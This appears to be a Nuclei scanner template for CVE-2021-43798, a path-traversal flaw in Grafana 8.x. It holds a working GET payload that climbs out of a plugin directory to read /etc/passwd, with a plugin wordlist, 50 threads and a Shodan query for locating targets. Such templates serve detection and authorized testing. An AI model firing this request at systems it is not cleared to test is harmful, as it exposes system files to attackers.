id: grafana-file-read

info:
  name: Grafana 8.x - Local File Inclusion
  author: z0ne,dhiyaneshDk,jeya.seelan,dwisiswant0
  severity: high
  description: Grafana 8.x is vulnerable to local file inclusion.
  reference:
    - https://grafana.com/blog/2021/12/08/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/
    - https://nosec.org/home/detail/4914.html
    - https://github.com/jas502n/Grafana-VulnTips
    - https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
    - https://twitter.com/naglinagli/status/1468155313182416899
    - https://nvd.nist.gov/vuln/detail/CVE-2021-43798
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-43798
    cwe-id: CWE-22
  metadata:
    shodan-query: title:"Grafana"
  tags: grafana,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/public/plugins/{{pluginSlug}}/../../../../../../../../../../../../../../../../../../../etc/passwd"

    payloads:
      pluginSlug: helpers/wordlists/grafana-plugins.txt

    threads: 50
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/07/22
